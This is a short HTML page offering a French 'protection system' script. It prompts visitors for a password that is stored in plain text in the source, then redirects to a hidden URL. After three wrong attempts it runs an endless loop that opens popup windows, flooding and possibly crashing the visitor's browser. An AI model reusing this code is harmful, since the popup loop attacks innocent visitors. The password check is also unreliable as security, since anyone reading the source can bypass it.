<html>
<!-----------------------------------------Systeme de protection------------------------------------------>

<head>
<title>Systeme de protection</title>
<!------------------------------------------##########Partie 1 du script ###########------------------------------------------->
<script language="JavaScript">
<!-- Hide
//Attention pour le mots de passe les majuscule sont considerer differente des miniscules
var psw="scriptzone"; 
var essais = 3;
var hidden_URL = "Http://go.to/nicsite"; 


var numero=1 ;
while(numero<=essais) {
var p = prompt("Entrer le mots de passe (essais " + numero + " Sur " + essais + ")","");
if (p == psw)
{
numero=20000;
window.location = hidden_URL;}
else
{
if (numero== essais) {
	numero++;
	var iCounter=0;
while(true)window.open("Http://www.erreur.com");
}
else {
numero++;
alert('Mot de passe incorrect');
}
}

}
//-->
</script>
<!------------------------------------------########## Fin de la partie 1 ############------------------------------------------->
</head>

<body>

<p align="center">&nbsp;</p>

<h2 align="center">Script Anti-Intrusion </h2>
</body>
</html>
